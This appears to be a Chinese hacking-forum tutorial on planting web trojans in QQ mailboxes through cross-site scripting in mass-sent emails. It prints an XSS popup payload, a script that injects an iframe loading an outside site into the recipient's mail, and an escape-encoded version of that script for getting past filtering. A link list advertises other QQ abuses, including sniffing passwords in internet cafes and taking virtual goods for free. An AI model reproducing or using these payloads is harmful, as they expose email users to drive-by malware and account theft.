[图文]利用QQ群发邮件跨站挂马记得以前搞博客跨站挂马!
是利用下面这段弹窗的:
<img src=javascript:open('http://www.slenk.net','幽月','width=400,height=300')>现在漏 洞被封啦!
下面搞QQ邮箱挂马:
大家可以利用QQ群发工具或软件来利用:
这是新漏洞!
这是跨站的代码。可以直接支持JS 但QQ有过滤空格,相信大家应该明白这一点。空格被转换成“ ” “ ”在HTML下代表空格。
源代码:
<script>document.write("<iframe src=http://www.slenk.net width=100% height=400></iframe><br>十三教程测试。")</script><script>
JS加密网:
http://www.webmasterhome.cn/tool/Encode.asp
加密后的代码:
<script>document.write(unescape('%3Cscript%3Edocument.write%28%22%3Ciframe%20src%3Dhttp%3A//www.slenk.net%20width%3D100%25%20height%3D400%3E%3C/iframe%3E%3Cbr%3E%u5341%u4E09%u6559%u7A0B%u6D4B%u8BD5%u3002%22%29%3C/script%3E%3Cscript%3E'))</script>
| 让死保的QQ密码保护变活保 | 03-14 | |
| 利用QQ群发邮件跨站挂马 | 02-05 | |
| 不是QQ好友 照样能看到对方的QQ秀 | 02-03 | |
| QQ秀的新漏洞 免费拿QQ秀不是问题 | 01-19 | |
| 迎接2007元旦QQ漏洞(远程可执行 | 01-04 | |
| 主动出击夺回被人盗走的QQ号码 | 12-19 | |
| 最新QQ刷业务漏洞! | 12-19 | |
| 狂刷QQ购物券 | 12-13 | |
| 网吧内嗅探MM的QQ号及密码 | 12-12 | |
| 通杀腾讯QCC所有商品免费拿! | 12-01 | |
| 强行和所有MM QQ聊天 | 11-24 | |
| 最新刷QQ业务方法 不要代理和肉鸡 | 11-21 | |
您现在的位置: